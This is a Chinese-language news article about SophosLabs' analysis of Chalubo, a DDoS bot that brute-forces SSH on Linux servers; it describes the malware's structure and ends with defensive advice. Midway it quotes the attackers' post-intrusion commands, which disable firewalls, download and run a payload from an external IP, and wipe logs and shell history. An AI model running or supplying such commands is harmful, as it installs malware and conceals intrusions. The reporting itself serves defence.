網(wǎng)絡(luò)安全公司Sophos旗下SophosLabs在本周一(10月22日)發(fā)表的一篇博文中指出，他們近兩個月一直在持續(xù)關(guān)注一場開始于9月初的網(wǎng)絡(luò)攻擊活動，目標是開啟了SSH服務(wù)器的Linux服務(wù)器。而在這場攻擊活動中，攻擊者的主要目的在于傳播一種被他們稱之為“Chalubo”的最新自動化DDos攻擊工具。

SophosLabs的分析表明，攻擊者使用了ChaCha流密碼來加密Chalubo的主組件以及相應(yīng)的Lua腳本，而在最新的版本中，攻擊者已經(jīng)采用了更常見的Windows惡意軟件原理來阻止對Chalubo的檢測。不變的是，最新版本的Chalubo同樣整合了來自Xor.DDoS和Mirai惡意軟件家族的代碼。

在8月下旬開始傳播，目前已有多個版本

根據(jù)SophosLabs的說法，Chalubo于8月下旬開始通過網(wǎng)絡(luò)感染目標設(shè)備，攻擊者隨后會通過在受感染設(shè)備上發(fā)出命令來檢索它。Chalubo實際上由三部分組成：下載模塊(downloader)、主bot程序(最初僅能夠在具有x86處理器架構(gòu)的系統(tǒng)上運行)和Lua命令腳本。

到了10月中旬，攻擊者開始發(fā)出檢索Elknot dropper(檢測為Linux/DDoS-AZ)的命令，它被用于提供Chalubo(ChaCha-Lua-bot)軟件包的其余部分。

此外，目前已經(jīng)出現(xiàn)了能夠在不同處理器架構(gòu)上運行的各種bot程序版本，包括32位和64位的ARM、x86、x86_64、MIPS、MIPSEL和PowerPC。這可能表明，這場網(wǎng)絡(luò)攻擊活動的測試階段已經(jīng)結(jié)束，或許我們之后會看到基于Chalubo攻擊活動數(shù)量的持續(xù)上升。

嘗試暴力破解密碼，強制登錄SSH服務(wù)器

SophosLabs表示，由他們部署的蜜罐系統(tǒng)最初在2018年9月6日記錄了相關(guān)攻擊。Chalubo的bot程序首先會嘗試暴力破解密碼，以強制登錄SSH服務(wù)器。

一旦攻擊者獲得了對目標設(shè)備的訪問權(quán)限，他們就會發(fā)出以下命令：

/etc/init.d/iptables stop

service iptables stop

SuSEfirewall2 stop

reSuSEfirewall2 stop

chattr -i /usr/bin/wget

chmod 755 /usr/bin/wget

yum install -y wget

wget -c hxxp://117.21.191.108:8694/libsdes -P /usr/bin/

chmod 777 /usr/bin/libsdes

nohup /usr/bin/libsdes > /dev/null 2>&1 &

export HISTFILE=/dev/null

rm -f /var/log/wtmp

history -c

雖然攻擊手法十分常見，但攻擊者使用了分層方法來下載惡意組件，并且使用的加密方法對于Linux惡意軟件而言，也是我們所不常見的。

事實上，如果仔細查看負責持續(xù)攻擊的代碼段的話，我們能夠發(fā)現(xiàn)Chalubo已經(jīng)從Xor.DDoS惡意軟件家族中復(fù)制了DelService和AddService函數(shù)。另外，一些代碼段復(fù)制于Mirai惡意軟件，如一些隨機函數(shù)和util_local_addr函數(shù)的擴展代碼。

SophosLabs提出的一些預(yù)防建議和防范措施

由于Chalubo感染目標系統(tǒng)的主要方法是通過對使用通用的用戶名和密碼組合對SSH服務(wù)器的登錄憑證進行暴力破解，因此SophosLabs建議SSH服務(wù)器的系統(tǒng)管理員(包括嵌入式設(shè)備)應(yīng)更改這些設(shè)備上的默認密碼。如果可能的話，系統(tǒng)管理員最好使用SSH密鑰，而不是登錄密碼。

此外，與其他任何設(shè)備一樣，保持系統(tǒng)更新、及時安裝官方發(fā)布的修復(fù)補丁，以及安裝實用的防病毒軟件都會是很好的主動防御措施。